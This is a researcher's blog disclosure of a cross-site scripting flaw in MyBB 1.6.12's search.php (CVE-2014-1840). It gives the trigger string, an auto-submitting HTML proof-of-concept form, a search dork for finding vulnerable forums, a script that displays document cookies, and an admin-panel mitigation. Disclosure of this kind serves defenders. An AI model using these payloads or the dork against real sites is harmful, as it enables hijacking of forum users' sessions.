MyBB 1.6.12 POST XSS 0day

This is a weird bug I found in MyBB. I fuzzed the input of the search.php file. This was my input given.

alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload

MyBB throws out a SQL error:

SELECT t.tid, t.firstpost
FROM mybb_threads t
WHERE 1=1 AND t.closed NOT LIKE 'moved|%'
AND (  LOWER(t.subject) LIKE '%&lt;foo&gt; &lt;h1&gt; &lt;script&gt; alert (bar) () ; //%'  LOWER(t.subject)
LIKE '%&gt; &lt; prompt \x41 \%42 constructor onload%')

fuzz1

This made me analyze and reverse this to find the cause. After filtering out this was the correct input which can cause this error.

This part should be constant or'(“\

To reproduce this issue you can add any char value in front on or'(“\  and 2 char values after or'(“\  and you cannot have any spaces in between them.

This will be the skeleton:

[1 char value]or'(“\[2 char values]

Examples:

1or'(“\00

qor'(“\2a

You can have a space like this

qor'(“\ a

SELECT t.tid, t.firstpost
FROM mybb_threads t
WHERE 1=1
AND t.closed NOT LIKE 'moved|%'  AND (  LOWER(t.subject)
LIKE '%qor (%'  LOWER(t.subject) LIKE '%\2a%')

finalerror

How to Inject JavaScript and HTML?

We can inject HTML + JavaScript but the search.php filters out ‘ “ [] – characters. This is the method you could use inject your payload. If we put our constant in the middle we can inject our payload in front and after it. If we inject it at the beginning of the constant the payload will be stored in this manner.

<Payload here>qor'(“\2a

SELECT t.tid, t.firstpost
FROM mybb_threads t
WHERE 1=1 AND t.closed NOT LIKE 'moved|%'  
AND (  LOWER(t.subject) LIKE '%qor (%'  LOWER(t.subject) LIKE '%\2a%')

For example if we inject a HTML header at the beginning

<h1>Osanda</h1>qor'(“\2a

It will look like this inside the source:

SELECT t.tid, t.firstpost
FROM mybb_threads t
WHERE 1=1 AND t.closed NOT LIKE 'moved|%'  
AND (  LOWER(t.subject) LIKE '%<h1>Osanda</h1>>qor (%'  LOWER(t.subject) LIKE '%\2a%')

htmi1

Now if we try injecting at the end of our payload it will be stored in two places like this in the source.

qor'(“\2a

The payload is thrown out in the SQL error itself.

1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 
'LOWER(t.subject) LIKE '%\2a%')' at line 3

The second place is inside the query.

SELECT t.tid, t.firstpost
FROM mybb_threads t
WHERE 1=1        
AND t.closed NOT LIKE 'moved|%'  
AND (  LOWER(t.subject) LIKE '%qor (%'  LOWER(t.subject) LIKE '%\2a%')

Example:

htmli2

This would be an example of JavaScript being interpreted alert(/Osanda/). Notice that our string is converted to lower case characters due to the SQL query.

XSS`

Remember this filters out ‘ “ [] — characters. Therefore we can use and external script source for performing further client side attacks.

Proof of Concept


<html>
<!--
Exploit-Title: MyBB 1.6.12 POST XSS 0day
Google-Dork: inurl:index.php intext:Powered By MyBB
Date: Februrary 2nd of 2014
Bug Discovered and Exploit Author: Osanda Malith Jayathissa
E-Mail: osandajayathissa[at]gmail.com
Vendor Homepage: http://www.mybb.com
Software Link: http://resources.mybb.com/downloads/mybb_1612.zip
Version: 1.6.12 (older versions might be vulnerable)
Tested on: Windows 8 64-bit
Video: https://www.youtube.com/watch?v=67MfgixmWgo
Original write-up: https://osandamalith.wordpress.com/2014/02/02/mybb-1-6-12-post-xss-0day
CVE: CVE-2014-1840
-->
  <body>
    <form name="exploit" action="http://localhost/mybb_1612/Upload/search.php" method="POST">
      <input type="hidden" name="action" value="do_search" />
      <input type="hidden" name="keywords" value="qor&apos;(&quot;\2a&lt;script&gt;alert(/XSS/)&lt;/script&gt; " />
    <script>document.exploit.submit(); </script>
    </form>
  </body>
</html>

POC Video

You could do something creative like this in an external source to view the domain, cookies and exploitation beyond the filters. You can define your source like this.

qor'("\2a

This will be containing in the poc file.

document.write('<h1>MyBB XSS 0day</h1><br/><h2>Domain: ' + document.domain + '</h2><br/>
<h3> Osanda and HR</h3><strong>User Cookies: </strong><br/>' + document.cookie);
alert('XSS by Osanda & HR');

external XSS

Thanks to Hood3dRob1n for this idea 🙂

I have no idea to inject SQL in this bug. You may give it a try and see.

Update:

FIX

To protect from this you can disable the “Standard” searching and enable “Full Text” option in the Admin CP.
Steps to do this.

  • Login to the Admin CP
  • Click Configuration -> Search Settings
  • Choose “Full Text” as the Search type and click Save Setting

Thanks to Cake for reminding me this.

fix

Advisories

CVE-2014-1840
http://www.osvdb.org/show/osvdb/102937
http://secunia.com/advisories/56680/
http://packetstormsecurity.com/files/125038/MyBB-1.6.12-POST-Cross-Site-Scripting.html
http://www.tenable.com/pvs-plugins/8629

Advertisements

18 thoughts on “MyBB 1.6.12 POST XSS 0day

  1. Pretty nice post. I just stumbled upon your weblog and wished to say that I have truly enjoyed browsing your
    blog posts. After all I will be subscribing to your rss
    feed and I hope you write again very soon!

  2. Exceptional post however I was wondering if you could write a litte more on this topic?

    I’d be very grateful if you could elaborate a little bit further.
    Kudos!

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s